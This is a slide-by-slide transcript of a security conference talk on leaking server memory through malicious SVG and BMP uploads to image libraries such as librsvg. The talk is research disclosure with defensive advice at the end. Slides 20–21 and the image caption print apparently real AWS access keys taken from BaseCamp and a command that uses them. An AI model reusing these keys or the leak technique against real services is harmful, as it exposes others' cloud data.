![BaseCamp
Dumped memory contained part of a config file with AWS keys...
Ne|rĎty7h6jl=Qj~lpI3>=wproduction_s3_primary:
service: S3
access_key_id: AKIAS5PME4CT5QW2PJJU
secret_access_key: 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
region: us-east-2
bucket: bc3-production-us-east-2
upload:
storage_class: INTELLIGENT_TIERING
:=ǖ%zcf^vl+_L]=WNBC>tAfDhhUBh+"+fa#](https://image.slidesharecdn.com/presentation-250424124318-abdb257f/85/Dead-Pixel-A-Practical-Guide-to-Attacking-Server-Side-Image-Processors-BSides-Prague-2025-20-320.jpg){kind=tracking}
Dead Pixel: A Practical Guide to Attacking Server-Side Image Processors (BSides Prague 2025)
- 1. Dead Pixel: A Practical Guide to Attacking Server-Side Image Processors Emil Lerner
- 2. $ id Emil Lerner occasional bughunter security researcher Bushwhackers CTF team
- 4. Attack Model 👾 Attacker 🖥️ Server Open-source library 📤Multimedia Upload Complicated binary input 🖼️Image Preview Output Channel
- 5. Previous Research 2016 ImageTragick (CVE-2016-3714) 2017 *Bleed 2018 GhostScript escapes 2023 Librsvg vulnerabilities ...to be continued...
- 6. SVG XML based vector image format A lot of implementations Supports raster image inclusion
- 7. Library Detection: Try Ambigous Payloads ImageMagick PIL (Pillow) Java AWT
- 8. Library Detection For SVG: Try Ambigous Payloads <svg width="600" height="600" xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink"> <image xlink:href="data:image/png;base64,..." y="0"/> <image xlink:href="data:image/pcx;base64,..." y="200"/> <image path="data:image/png;base64,..." y="400"/> </svg>
- 9. Library Detection For SVG: Try Ambigous Payloads ImageMagick's SVG parser librsvg Inkscape
- 10. LibRSVG Written in Rust; code is clean Not that much security vulnerabilities Used to depend on libgdk-pixbuf for raster images (not the case anymore)
- 11. Libgdk-Pixbuf Written in C Code is complicated Has a history of memory safety issues
- 12. Uninitialized Memory Leak In Preview 1 2 3 Same server process Some business flow unallocated memory SECRET SECRET malloc() store data free() Buggy library SECRET SECRET 🖼️ malloc() no overwrite generate preview 🖼️ 👾 SECRET download recover
- 13. Uninitialized Memory Leak In Preview Prerequisite: The vulnerable library must be used in the same system-level process as the sensitive information
- 14. MSAN For Lazy Ones $ export LD_PRELOAD=$PWD/libmfill.so $ MALLOC_FILL=AB rsvg-convert test_bmp.svg -o /dev/stdout | sha256sum ef80535b64f189f0e17ee104efd219a6b97ce1cd3739922285b4c489 - $ MALLOC_FILL=AB rsvg-convert test_bmp.svg -o /dev/stdout | sha256sum ef80535b64f189f0e17ee104efd219a6b97ce1cd3739922285b4c489 - $ MALLOC_FILL=DE rsvg-convert test_bmp.svg -o /dev/stdout | sha256sum 20201eeb30c53adcc5b4483999e0995cd53272195665e95974a7ebc6 - same diff
- 15. The Issue Itself Truncate a bmp leaving only header Put in <image href="data:image/png;base64,..."> Profit :)
- 16. OneDrive Just upload the payload many times and leak other users' data!
- 17. OneDrive Just upload the payload many times and leak other users' data!
- 18. BaseCamp Librsvg executed in the web server process (Ruby on Rails) Lots of interesting data Had to automate avatar uploading and downloading
- 19. BaseCamp: Fighting JPEG Encoding <image id="image_0" xlink:href="data:image/bmp;base64,..." /> <filter id="filter_0"> <feComponentTransfer> <feFuncR type="table" tableValues="..." /> <feFuncG type="table" tableValues="..." /> <feFuncB type="table" tableValues="..." /> <feComponentTransfer> <filter id="filter_1"> ... </filter> ... <use xlink:href="#image_0" filter="url(#filter_0)" /> <use xlink:href="#image_0" filter="url(#filter_1)" />
- 20. BaseCamp Dumped memory contained part of a config file with AWS keys... Ne|rĎty7h6jl=Qj~lpI3>=wproduction_s3_primary: service: S3 access_key_id: AKIAS5PME4CT5QW2PJJU secret_access_key: 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 region: us-east-2 bucket: bc3-production-us-east-2 upload: storage_class: INTELLIGENT_TIERING :=ǖ%zcf^vl+_L]=WNBC>tAfDhhUBh+"+fa#
- 21. BaseCamp ... that were allowed to be used from the outside of BaseCamp! $ AWS_DEFAULT_REGION=us-east-2 AWS_ACCESS_KEY_ID=AKIAS5PME4CT5QW2PJJU AWS_SECRET_ACCESS_KEY=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 aws sts get-caller-identity { "UserId": "AIDAJ3SCYTQTFCJH2TKGY", "Account": "200748097703", "Arn": "arn:aws:iam::200748097703:user/bc3-storage" }
- 22. PostScript Vector image format Also, a programming language (for printers) GhostScript is the most common server-side interpreter (directly or as a dependency)
- 25. Demo 0:00 1:5
- 27. Isolated Means Isolated No infrastructure access No network access (both internal and the internet) No container reuse for different users No sensitive configs in the container